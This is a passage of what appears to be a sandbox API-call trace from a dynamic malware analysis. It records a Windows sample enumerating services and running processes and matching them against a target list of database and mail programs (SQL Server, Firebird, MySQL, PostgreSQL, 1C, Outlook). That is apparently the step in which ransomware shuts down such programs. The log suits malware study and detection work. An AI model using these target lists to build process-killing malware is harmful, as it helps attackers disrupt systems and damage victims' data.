lpString2="AudioEndpointBuilder") returned 1 [0038.706] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0038.706] lstrlenW (lpString="AudioSrv") returned 8 [0038.706] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0038.706] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0038.706] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0038.706] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0038.706] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0038.706] lstrlenW (lpString="BFE") returned 3 [0038.706] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0038.706] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0038.706] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0038.706] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0038.706] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0038.706] lstrlenW (lpString="CryptSvc") returned 8 [0038.706] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0038.706] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0038.707] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0038.707] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0038.707] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0038.707] lstrlenW (lpString="CscService") returned 10 [0038.707] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0038.707] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0038.707] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0038.707] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0038.707] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0038.707] lstrlenW (lpString="DcomLaunch") returned 10 [0038.707] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0038.707] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0038.707] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0038.707] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0038.707] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0038.707] lstrlenW (lpString="Dhcp") returned 4 [0038.707] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0038.707] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0038.707] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0038.707] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0038.707] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0038.707] lstrlenW (lpString="Dnscache") returned 8 [0038.707] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0038.707] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0038.707] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0038.707] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0038.707] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0038.707] lstrlenW (lpString="DPS") returned 3 [0038.707] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0038.707] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0038.707] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0038.707] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0038.707] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0038.707] lstrlenW (lpString="eventlog") returned 8 [0038.708] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0038.708] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0038.708] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0038.708] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0038.708] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0038.708] lstrlenW (lpString="EventSystem") returned 11 [0038.708] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0038.708] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0038.708] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0038.708] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0038.708] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0038.708] lstrlenW (lpString="gpsvc") returned 5 [0038.708] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0038.708] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0038.708] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0038.708] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0038.708] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0038.708] lstrlenW (lpString="iphlpsvc") returned 8 [0038.708] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0038.708] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0038.708] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0038.708] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0038.708] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0038.708] lstrlenW (lpString="LanmanServer") returned 12 [0038.708] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0038.708] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0038.708] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0038.708] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0038.708] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0038.708] lstrlenW (lpString="LanmanWorkstation") returned 17 [0038.708] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0038.708] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0038.708] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0038.708] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0038.708] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0038.709] lstrlenW (lpString="lmhosts") returned 7 [0038.709] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0038.709] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0038.709] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0038.709] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0038.709] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0038.709] lstrlenW (lpString="MMCSS") returned 5 [0038.709] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0038.709] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0038.709] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0038.709] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0038.709] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0038.709] lstrlenW (lpString="MpsSvc") returned 6 [0038.709] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0038.709] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0038.709] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0038.709] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0038.709] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0038.709] lstrlenW (lpString="Netman") returned 6 [0038.709] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0038.709] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0038.709] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0038.709] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0038.709] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0038.709] lstrlenW (lpString="netprofm") returned 8 [0038.709] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0038.709] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0038.709] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0038.709] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0038.709] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0038.709] lstrlenW (lpString="NlaSvc") returned 6 [0038.709] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0038.709] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0038.709] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0038.710] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0038.710] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0038.710] lstrlenW (lpString="nsi") returned 3 [0038.710] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0038.710] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0038.710] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0038.710] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0038.710] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0038.710] lstrlenW (lpString="PcaSvc") returned 6 [0038.710] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0038.710] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0038.710] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0038.710] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0038.710] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0038.710] lstrlenW (lpString="PlugPlay") returned 8 [0038.710] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0038.710] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0038.710] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0038.710] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0038.710] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0038.710] lstrlenW (lpString="Power") returned 5 [0038.710] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0038.710] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0038.710] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0038.710] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0038.710] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0038.710] lstrlenW (lpString="ProfSvc") returned 7 [0038.710] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0038.710] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0038.710] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0038.710] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0038.710] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0038.710] lstrlenW (lpString="RpcEptMapper") returned 12 [0038.710] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0038.710] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0038.711] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0038.711] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0038.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0038.711] lstrlenW (lpString="RpcSs") returned 5 [0038.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0038.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0038.711] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0038.711] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0038.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0038.711] lstrlenW (lpString="SamSs") returned 5 [0038.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0038.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0038.711] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0038.711] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0038.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0038.711] lstrlenW (lpString="Schedule") returned 8 [0038.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0038.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0038.711] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0038.711] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0038.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0038.711] lstrlenW (lpString="SENS") returned 4 [0038.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0038.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0038.711] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0038.711] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0038.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0038.711] lstrlenW (lpString="ShellHWDetection") returned 16 [0038.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0038.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0038.711] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0038.711] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0038.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0038.711] lstrlenW (lpString="Spooler") returned 7 [0038.712] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0038.712] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0038.712] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0038.712] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0038.712] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0038.712] lstrlenW (lpString="SysMain") returned 7 [0038.712] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0038.712] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0038.712] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0038.712] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0038.712] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0038.712] lstrlenW (lpString="Themes") returned 6 [0038.712] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0038.712] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0038.712] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0038.712] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0038.712] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0038.712] lstrlenW (lpString="TrkWks") returned 6 [0038.712] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0038.712] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0038.712] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0038.712] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0038.712] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0038.712] lstrlenW (lpString="UxSms") returned 5 [0038.712] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0038.712] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0038.712] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0038.712] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0038.712] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0038.712] lstrlenW (lpString="VSS") returned 3 [0038.712] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0038.712] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0038.712] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0038.712] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0038.712] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0038.713] lstrlenW (lpString="WdiServiceHost") returned 14 [0038.713] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0038.713] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0038.713] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0038.713] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0038.713] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0038.713] lstrlenW (lpString="WdiSystemHost") returned 13 [0038.713] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0038.713] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0038.713] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0038.713] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0038.713] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0038.713] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0038.713] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0038.713] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0038.713] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0038.713] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0038.713] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0038.713] lstrlenW (lpString="Winmgmt") returned 7 [0038.713] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0038.713] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0038.713] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0038.713] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0038.713] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0038.713] lstrlenW (lpString="WPDBusEnum") returned 10 [0038.713] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0038.713] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0038.713] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0038.713] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0038.713] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0038.713] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3808fc0 | out: hHeap=0x5f0000) returned 1 [0038.713] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f8 [0038.716] Process32FirstW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0038.717] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0038.717] lstrlenW (lpString="System") returned 6 [0038.717] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0038.717] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0038.717] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0038.717] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0038.718] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0038.718] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0038.718] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0038.718] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0038.718] lstrlenW (lpString="smss.exe") returned 8 [0038.718] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0038.718] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0038.718] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0038.718] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0038.718] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0038.718] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0038.718] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0038.718] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0038.719] lstrlenW (lpString="csrss.exe") returned 9 [0038.719] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0038.719] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0038.719] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0038.719] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0038.719] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0038.719] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0038.719] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0038.719] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0038.720] lstrlenW (lpString="wininit.exe") returned 11 [0038.720] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0038.720] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0038.720] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0038.720] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0038.720] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0038.720] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0038.720] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0038.720] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0038.721] lstrlenW (lpString="csrss.exe") returned 9 [0038.721] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0038.721] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0038.722] lstrlenW (lpString="winlogon.exe") returned 12 [0038.722] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0038.722] lstrlenW (lpString="services.exe") returned 12 [0038.722] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0038.723] lstrlenW (lpString="lsass.exe") returned 9 [0038.723] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0038.724] lstrlenW (lpString="lsm.exe") returned 7 [0038.724] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0038.724] lstrlenW (lpString="svchost.exe") returned 11 [0038.724] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, 